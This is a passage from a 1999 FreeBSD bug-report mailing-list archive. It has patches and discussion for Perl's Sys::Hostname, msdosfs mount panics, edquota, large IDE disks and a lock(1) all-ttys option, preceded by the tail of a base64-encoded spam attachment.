6+D44PL8IOIg/fLzIO/w7uPw4Ozs8yDy4Oog7O3u4+4g5PDz5+XpIOgg5+3g 6u7s+/UsIOrg6iDn4PXu8ujy5S4NCs/w7uPw4Ozs4CDv8OXk8/Hs4PLw6OLg 5fIg4vvv6+Dy8yDh7u3z8eAg4iAyNSUg7vIg8uX1IPHz7OwsIOru8u7w++Ug 4fPk8/INCu/u6/P34PL8IOv+5OgsIO/w6OPr4Pi47e375SDi4OzoIOIg7/Du 4/Dg7OzzLiDd8u4g7eDs7e7j7iDh7uv8+OUsIPfl7CDiDQrk8PPj6PUg7+7k 7uHt+/Ug4Or26P/1LjwvRk9OVD48L0ZPTlQ+PC9CPg0KPEJSPjxCPjxGT05U IEZBQ0U9IkNvbWljIFNhbnMgTVMsVmVyZGFuYSxUYWhvbWEsQXJpYWwsSGVs dmV0aWNhIj48Rk9OVCBTSVpFPS0xPs/w4OLk4A0KU3BlZGlhLk5ldCDn4P/i 6//l8iwg9/LuIO3lIOPg8ODt8ujw8+XyIO7k6O3g6u7i7ukg8fLu6Ozu8fLo IO/u6uDn7uIg4vG4DQri8OXs/y4gyuDqIO7t6CDv6Pjz8iwg4fPk8/Ig8fLg 8ODy/PH/IPHk5evg8vwg4vG4IOLu5+zu5u3u5SDk6/8g7eDo4vvx+OXpDQrx 8u7o7O7x8ugg7+7q4Ofu4iwg7uTt4OruIOPg8ODt8ujpIOTg8vwg7eUg7O7j 8/I6IP3y7iDw++3u6i48L0ZPTlQ+PC9GT05UPjwvQj4NCjxCUj48Qj48Rk9O VCBGQUNFPSJDb21pYyBTYW5zIE1TLFZlcmRhbmEsVGFob21hLEFyaWFsLEhl bHZldGljYSI+PEZPTlQgU0laRT0tMT7E6/8NCvDl4+jx8vDg9ujoIO/w7vHy 7iD5uOvq7ejy5SA8QSBIUkVGPSJodHRwOi8vd3d3LnNwZWRpYS5uZXQvY2dp LWJpbi9kaXIvdHouY2dpP3J1bj1zaG93X3N2YyZmbD04JnZpZD0zOTE4MTQi PkPexMA8L0E+LA0K6+jh7iDv7iDt4Ofi4O3o/iDv8O7j8ODs7Psg6CDv5fDl 6eS48uUg7eAg8fLw4O3o9vMg8OXj6PHy8OD26OguIMXx6+gg8uDsDQrh8+Tz 8iDn4O/w4Pjo4uDy/CDt7uzl8CDv8Ojj6+Dx6OL45ePuIOLg8SDiIP3y8yDv 8O7j8ODs7PMsIO/w7vjzIPHx++vg8vzx/w0K7eAg7O7pOiAzOTE4MTQuPC9G T05UPjwvRk9OVD48L0I+DQo8QlI+Jm5ic3A7DQo8UD48QlI+DQo8Q0VOVEVS Pg0KPFA+PEk+PEJMSU5LPjxGT05UIENPTE9SPSIjQ0M2NkNDIj4mbmJzcDs8 L0ZPTlQ+PEZPTlQgQ09MT1I9IiNGRjAwMDAiPsTr/w0K8uX1IOry7iDv7uTv 6PHg6/H/IO3gIO/w7uPw4Ozs+ywg4vvv6+D36OLg/vno5SDn4CDxuPD06O3j LCDv8OXk6+Dj4P4g4g0K7+7k4PDu6iD38+Tl8e3z/iDv8O7j8y4gzeDn++Lg 5fLx/yA8QSBIUkVGPSJodHRwOi8vd3d3LnByb2dlbmljLmNvbS9wcm9kdWN0 cy9mcyI+RmFrZVN1cmY8L0E+DQrRIO3l6TwvRk9OVD48L0JMSU5LPjwvST4N CjxCUj48ST48QkxJTks+PEZPTlQgQ09MT1I9IiNGRjAwMDAiPiZuYnNwO+zu 5u3uIO/w7v/i6//y/CDt5eH74uDr8/4g4Ory6OLt7vHy/A0K4u4g4vDl7P8g 7/Py5fjl8fLi6OkuIMTu8fLg8u737e4g4urr/vfo8vwg5bgg7/DoIPDg4e7y 5SDoIOzu5u3uIO7y7/Dg4uv/8vzx/w0K7+jy/CDv6OLuLDwvRk9OVD48L0JM SU5LPjwvST4NCjxCUj48ST48QkxJTks+PEZPTlQgQ09MT1I9IiNGRjAwMDAi PiZuYnNwOyDr6OHuIOjj8ODy/CDiIOTu7Ojt7i4gzu3gIPHg7OANCu/w7v/i 6PIg4Ory6OLt7vHy/CDoIO7j7u246iwg7u/u4uX54P756Okg7iDn4PDg4eDy ++Lg7ejoIPLg6uj1IOLu5uTl6+Xt7fv1DQrn5eu47e4t9fDz8fL/+ej1PC9G T05UPjwvQkxJTks+PC9JPg0KPEJSPjxJPjxCTElOSz48Rk9OVCBDT0xPUj0i I0ZGMDAwMCI+Jm5ic3A7IOHz7ODm5eosIOLxuCDi8OXs/yDh8+Tl8iDx4uXy 6PL88f8NCufl67jt++wg8eLl8u7sITwvRk9OVD48L0JMSU5LPjwvST4NCjxQ PiZuYnNwOyZuYnNwOyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo8UD4mbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsNCsLbIMzOxsXSxSDI0c/Oy9zHzsLA 0twg3dLTIMjN1M7QzMDWyN4gwiDPzsvNzswgzsHaxczFJm5ic3A7IM/OINHC zsXM0yDT0czO0tDFzcjeLA0KPEJSPsIg0s7MINfI0cvFIMTL3yDP0MjCy8XX xc3I3yDD0MDGxMDNIMog0c/OzdHO0NHKyMwgz9DOw9DAzMzAzCDEwM3NzsPO DQrCyMTAINEgz9DAws7MIMfAzMXN2yZuYnNwOyBJRCDNwCDRws7JIMvI183b yS48L0NFTlRFUj4NCg0KPFA+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7DQrCwNgmbmJzcDsg 3cvFytLQzs3N28kgwMTQxdEgwdvLIMLH39IgyMcgztLK0NvSzsPOIMjR0s7X zcjKwC4NCjxCUj4mbmJzcDsgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPEJSPiZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOw0KDQo8Qj48Rk9OVCBGQUNFPSJDb21pYyBTYW5z IE1TLFZlcmRhbmEsVGFob21hLEFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la RT0tMT7N8ywNCuLu8iDv7ubg6/PpIOgg4vG4LiDF8evoIOLu5+3o6u3z8iDq 4Oro5S3y7iDx6+7m7e7x8uggLSA8QSBIUkVGPSJtYWlsdG86YWFhYmJiY2Nj ZGRkQG1haWwucnUiPu/o+Ojy5TwvQT4sDQr/IO/u8fLg8OD+8fwg5ODy/CDu 8uLl8iDy4Oog8eru8O4sIOrg6iDx7O7j8y48L0ZPTlQ+PC9GT05UPjwvQj4N CjxQPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOw0K0+Tg9+gg4uDsLCDv7uHu6/z45SDv7uTv6PHg 4vjo9fH/IO7yIOLg+OXj7iDo7OXt6Cwg4CDx7u7y4uXy8fLi5e3t7iDoIOTl 7eXjDQohDQo8QlI+Jm5ic3A7DQo8QlI+Jm5ic3A7DQo8QlI+Jm5ic3A7DQo8 QlI+Jm5ic3A7DQo8QlI+Jm5ic3A7DQo8QlI+Jm5ic3A7DQo8QlI+Jm5ic3A7 DQo8L0JPRFk+DQo8L0hUTUw+DQo= --= Multipart Boundary 1224990427-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 18:50: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 40D3A14D3B for ; Thu, 23 Dec 1999 18:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA49060; Thu, 23 Dec 1999 18:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blocker.mincom.com (blocker2.mincom.com [203.15.57.34]) by hub.freebsd.org (Postfix) with ESMTP id 873101574D for ; Thu, 23 Dec 1999 18:44:08 -0800 (PST) (envelope-from philh@mincom.com) Received: (from uucp@localhost) by blocker.mincom.com (8.9.3/8.9.3) id MAA81240 for ; Fri, 24 Dec 1999 12:44:06 +1000 (EST) (envelope-from philh@portal.mincom.oz.au) Received: from portal.mincom.oz.au(172.17.100.4) via SMTP by blocker.mincom.oz.au, id smtpdd81236; Fri Dec 24 12:44:01 1999 Received: (from philh@localhost) by portal.mincom.oz.au (8.9.3/8.8.5) id MAA61440; Fri, 24 Dec 1999 12:44:02 +1000 (EST) Message-Id: <199912240244.MAA61440@portal.mincom.oz.au> Date: Fri, 24 Dec 1999 12:44:02 +1000 (EST) From: Phil Homewood Reply-To: philh@mincom.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15662: [PATCH] perl5 Sys::Hostname fails if no PATH set Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15662 >Category: misc >Synopsis: [PATCH] perl5 Sys::Hostname fails if no PATH set >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 18:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Phil Homewood >Release: FreeBSD 3.3-STABLE i386 >Organization: Mincom Limited >Environment: >Description: perl5's Sys::Hostname.pm fails to get local host name if called with undefined $ENV{'PATH'}. This bug was introduced in r1.2 of src/contrib/perl5/lib/Hostname.pm with the taint fixes for backticked commands. The value returned by each eval{} block is in fact $ENV{'PATH'} instead of the (defined or undefined nature of) $host. Thus, the block that calls `hostname` will return true IFF the path is set. If it isn't, the `uname` block fails in the same way and the function croaks. >How-To-Repeat: Run a script that calls Sys::Hostname::hostname() with an undefined PATH. Watch it croak. >Fix: --- Hostname.pm.orig Fri Oct 1 09:31:37 1999 +++ Hostname.pm Fri Dec 24 12:30:54 1999 @@ -98,6 +98,7 @@ local $SIG{__DIE__}; $host = `(hostname) 2>/dev/null`; # bsdish $ENV{'PATH'} = $pathstack; + $host; } # method 4 - sysV uname command (may truncate) @@ -107,6 +108,7 @@ local $SIG{__DIE__}; $host = `uname -n 2>/dev/null`; ## sysVish $ENV{'PATH'} = $pathstack; + $host; } # method 5 - Apollo pre-SR10 >Release-Note: >Audit-Trail: >Unformatted: Phil Homewood To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 20:20:15 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D4BFD157A1 for ; Thu, 23 Dec 1999 20:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA62475; Thu, 23 Dec 1999 20:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 20:20:01 -0800 (PST) Message-Id: <199912240420.UAA62475@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Wes Bauske" Subject: Re: kern/15611: EIDE Large Disk Support, Newfs problem, File system corruption,IBM-DPTA-353750 Reply-To: "Wes Bauske" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15611; it has been noted by GNATS. From: "Wes Bauske" To: freebsd-gnats-submit@freebsd.org, rjbubon@bigi.com Cc: Subject: Re: kern/15611: EIDE Large Disk Support, Newfs problem, File system corruption,IBM-DPTA-353750 Date: Thu, 23 Dec 1999 22:10:06 -0600 I believe I'm running into a similar problem. I have a Maxtor 40GB IDE disk split into 2 slices. The first slice is 1GB with swap and root(/) in it and the second has a single 38GB file system. I created everything when I installed 3.3 on the system (Athlon, all ide devices) and the install worked without errors. After reboot, the large FS showed mounted but I couldn't write to it. I got "bad file descriptor". So, I unmounted and tried to remount. First try, mount segfaulted. Second try, I got back to "bad file descriptor". I would rate this as severe since it basically puts the machine out of commission. I had planned on adding more 40GB drives hoping to take advantage of FreeBSD's large file support/NFSV3. On a side note, the drive worked fine under Linux kernel 2.2.5 from RH6.0 so I know it is healthy. If someone has some ideas on how to debug/test a fix, please let me know. Thanks. Wes Bauske To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 20:28:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from feral.com (feral.com [192.67.166.1]) by hub.freebsd.org (Postfix) with ESMTP id 3C45615182 for ; Thu, 23 Dec 1999 20:28:11 -0800 (PST) (envelope-from mjacob@feral.com) Received: from semuta.feral.com (semuta [192.67.166.70]) by feral.com (8.9.3/8.9.3) with ESMTP id UAA26293; Thu, 23 Dec 1999 20:30:10 -0800 Date: Thu, 23 Dec 1999 20:30:10 -0800 (PST) From: Matthew Jacob Reply-To: mjacob@feral.com To: Wes Bauske Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15611: EIDE Large Disk Support, Newfs problem, File system corruption,IBM-DPTA-353750 In-Reply-To: <199912240420.UAA62475@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is this a specific h/w issue, or is it an issue with large filesystems? This all reminds me of various fun and games with large filesystems and getting fsck/mount/newfs to cope. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 21: 8:18 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from workhorse.iMach.com (workhorse.iMach.com [206.127.77.89]) by hub.freebsd.org (Postfix) with ESMTP id BF78514CBE; Thu, 23 Dec 1999 21:08:13 -0800 (PST) (envelope-from forrestc@workhorse.iMach.com) Received: from localhost (forrestc@localhost) by workhorse.iMach.com (8.8.8/8.8.8) with SMTP id WAA24414; Thu, 23 Dec 1999 22:05:41 -0700 (MST) Date: Thu, 23 Dec 1999 22:05:40 -0700 (MST) From: "Forrest W. Christian" To: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15658: Fix to edquota.c In-Reply-To: <199912232050.MAA18136@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In addition to the patch, something like the following should probably be added to the "BUGS" section of the man page: BUGS When a prototype user is specified using the -p option, if you specify a username containing only digits and a single hyphen, edquota will assume this is a uid range. A workaround is to provide the uid of the user instead of the username. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 21:20: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C04C215774 for ; Thu, 23 Dec 1999 21:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA70731; Thu, 23 Dec 1999 21:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 21:20:02 -0800 (PST) Message-Id: <199912240520.VAA70731@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Steve Price Subject: Re: misc/15658: Fix to edquota.c (fwd) Reply-To: Steve Price Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15658; it has been noted by GNATS. From: Steve Price To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: misc/15658: Fix to edquota.c (fwd) Date: Thu, 23 Dec 1999 23:14:07 -0600 (CST) ---------- Forwarded message ---------- Date: Thu, 23 Dec 1999 22:05:40 -0700 (MST) From: Forrest W. Christian To: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15658: Fix to edquota.c In addition to the patch, something like the following should probably be added to the "BUGS" section of the man page: BUGS When a prototype user is specified using the -p option, if you specify a username containing only digits and a single hyphen, edquota will assume this is a uid range. A workaround is to provide the uid of the user instead of the username. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 21:20:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 94839157C7 for ; Thu, 23 Dec 1999 21:20:09 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA70739; Thu, 23 Dec 1999 21:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 21:20:04 -0800 (PST) Message-Id: <199912240520.VAA70739@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Forrest W. Christian" Subject: Re: misc/15658: edquota misinterprets usernames as uid ranges Reply-To: "Forrest W. Christian" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15658; it has been noted by GNATS. From: "Forrest W. Christian" To: , Cc: Subject: Re: misc/15658: edquota misinterprets usernames as uid ranges Date: Thu, 23 Dec 1999 22:17:22 -0700 In addition to the patch, something like the following should probably be added to the "BUGS" section of the man page: BUGS When a prototype user is specified using the -p option, if you specify a username containing only digits and a single hyphen, edquota will assume this is a uid range. A workaround is to provide the uid of the user instead of the username. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 0:38:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3517E14E87; Fri, 24 Dec 1999 00:38:51 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA84454; Fri, 24 Dec 1999 00:38:50 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Fri, 24 Dec 1999 00:38:50 -0800 (PST) From: Message-Id: <199912240838.AAA84454@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, markm@FreeBSD.org Subject: Re: misc/15662: [PATCH] perl5 Sys::Hostname fails if no PATH set Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] perl5 Sys::Hostname fails if no PATH set Responsible-Changed-From-To: freebsd-bugs->markm Responsible-Changed-By: sheldonh Responsible-Changed-When: Fri Dec 24 00:38:23 PST 1999 Responsible-Changed-Why: Mark's the perl5 maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 1:47:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 08C5D15148; Fri, 24 Dec 1999 01:47:41 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA88329; Fri, 24 Dec 1999 01:47:40 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Fri, 24 Dec 1999 01:47:40 -0800 (PST) From: Message-Id: <199912240947.BAA88329@freefall.freebsd.org> To: vax@linkdead.paranoia.com, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/2119: [PATCH] mount lies to child about argv0, which causes crunch to lose Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] mount lies to child about argv0, which causes crunch to lose State-Changed-From-To: suspended->feedback State-Changed-By: sheldonh State-Changed-When: Fri Dec 24 01:46:23 PST 1999 State-Changed-Why: A huge number of fixes went into mount recently. Your How-To-Repeat produces the text: mount: Device busy Perhaps you'd like to look at the current state of this beast and offer your comments? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 1:50: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A3930151A5 for ; Fri, 24 Dec 1999 01:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA88522; Fri, 24 Dec 1999 01:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 24 Dec 1999 01:50:02 -0800 (PST) Message-Id: <199912240950.BAA88522@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Boris Popov Subject: Re: kern/15136: Panic on MSDOS FS mount Reply-To: Boris Popov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15136; it has been noted by GNATS. From: Boris Popov To: freebsd-gnats-submit@freebsd.org, netch@lucky.net Cc: Subject: Re: kern/15136: Panic on MSDOS FS mount Date: Fri, 24 Dec 1999 15:41:23 +0600 > On attempt to mount MSDOS (FAT16) file system, kernel falls to panic with > message: > panic: vm_fault: fault on nofault entry, addr=c16de000 This caused by inconsistent data in the boot record. Could please test the following patch and tell me if this helps: diff -u ../msdosfs_vfsops.c ./msdosfs_vfsops.c --- ../msdosfs_vfsops.c Sun Dec 19 12:07:56 1999 +++ ./msdosfs_vfsops.c Fri Dec 24 15:15:08 1999 @@ -364,6 +364,7 @@ struct byte_bpb50 *b50; struct byte_bpb710 *b710; u_int8_t SecPerClust; + u_long clusters; int ronly, error; /* @@ -595,14 +596,13 @@ pmp->pm_firstcluster = pmp->pm_rootdirblk + pmp->pm_rootdirsize; } - pmp->pm_nmbrofclusters = (pmp->pm_HugeSectors - pmp->pm_firstcluster) / - SecPerClust; - pmp->pm_maxcluster = pmp->pm_nmbrofclusters + 1; + pmp->pm_maxcluster = (pmp->pm_HugeSectors - pmp->pm_firstcluster) / + SecPerClust + 1; pmp->pm_fatsize = pmp->pm_FATsecs * pmp->pm_BytesPerSec; #ifndef __FreeBSD__ if (argp->flags & MSDOSFSMNT_GEMDOSFS) { - if ((pmp->pm_nmbrofclusters <= (0xff0 - 2)) + if ((pmp->pm_maxcluster <= (0xff0 - 2)) && ((dtype == DTYPE_FLOPPY) || ((dtype == DTYPE_VNODE) && ((pmp->pm_Heads == 1) || (pmp->pm_Heads == 2)))) ) { @@ -633,6 +633,15 @@ pmp->pm_fatdiv = 1; } } + + clusters = (pmp->pm_fatsize / pmp->pm_fatmult) * pmp->pm_fatdiv; + if (pmp->pm_maxcluster >= clusters) { + printf("Warning: number of clusters (%ld) exceeds FAT " + "capasity (%ld)\n", pmp->pm_maxcluster + 1, clusters); + pmp->pm_maxcluster = clusters - 1; + } + + if (FAT12(pmp)) pmp->pm_fatblocksize = 3 * pmp->pm_BytesPerSec; else @@ -829,7 +838,7 @@ pmp = VFSTOMSDOSFS(mp); sbp->f_bsize = pmp->pm_bpcluster; sbp->f_iosize = pmp->pm_bpcluster; - sbp->f_blocks = pmp->pm_nmbrofclusters; + sbp->f_blocks = pmp->pm_maxcluster + 1; sbp->f_bfree = pmp->pm_freeclustercount; sbp->f_bavail = pmp->pm_freeclustercount; sbp->f_files = pmp->pm_RootDirEnts; /* XXX */ diff -u ../msdosfsmount.h ./msdosfsmount.h --- ../msdosfsmount.h Sat Aug 28 07:48:11 1999 +++ ./msdosfsmount.h Fri Dec 24 12:18:12 1999 @@ -73,7 +73,6 @@ u_long pm_rootdirblk; /* block # (cluster # for FAT32) of root directory number */ u_long pm_rootdirsize; /* size in blocks (not clusters) */ u_long pm_firstcluster; /* block number of first cluster */ - u_long pm_nmbrofclusters; /* # of clusters in filesystem */ u_long pm_maxcluster; /* maximum cluster number */ u_long pm_freeclustercount; /* number of free clusters */ u_long pm_cnshift; /* shift file offset right this amount to get a cluster number */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 3:10:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7484114FE6 for ; Fri, 24 Dec 1999 03:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA94923; Fri, 24 Dec 1999 03:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from stalker.stu.cn.ua (cinet-gw.stu.cn.ua [212.86.102.3]) by hub.freebsd.org (Postfix) with ESMTP id 2894A1506A for ; Fri, 24 Dec 1999 03:00:07 -0800 (PST) (envelope-from acid@stalker.stu.cn.ua) Received: (from acid@localhost) by stalker.stu.cn.ua (8.9.3/8.9.3) id MAA22301; Fri, 24 Dec 1999 12:59:56 +0200 (EET) Message-Id: <199912241059.MAA22301@stalker.stu.cn.ua> Date: Fri, 24 Dec 1999 12:59:56 +0200 (EET) From: acid@stu.cn.ua To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15663: patch for lock (1) adding capability to lock all ttys Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15663 >Category: bin >Synopsis: none >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 03:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Michael Vasilenko >Release: FreeBSD 3.4-STABLE i386 >Organization: Chernigiv State Technological University >Environment: >Description: lock (1) is unable to lock all ttys like Linux's vlock. This patch adds this capability to lock (1) >How-To-Repeat: >Fix: diff -c -r lock.orig/lock.1 lock/lock.1 *** lock.orig/lock.1 Sat Sep 14 12:00:48 1996 --- lock/lock.1 Fri Dec 24 12:58:32 1999 *************** *** 54,59 **** --- 54,63 ---- Options: .Pp .Bl -tag -width Fl + .It Fl a + Lock all ttys. To use this feature, you must be root or + .Nm lock + must be installed setuid to root. .It Fl n Don't use a timeout value. Terminal will be locked forever. .It Fl p diff -c -r lock.orig/lock.c lock/lock.c *** lock.orig/lock.c Sun Aug 29 18:29:56 1999 --- lock/lock.c Fri Dec 24 12:15:44 1999 *************** *** 68,84 **** #include #include #include #define TIMEOUT 15 ! void quit(), bye(), hi(); static void usage __P((void)); struct timeval timeout; struct timeval zerotime; struct sgttyb tty, ntty; long nexttime; /* keep the timeout time */ ! int no_timeout; /* 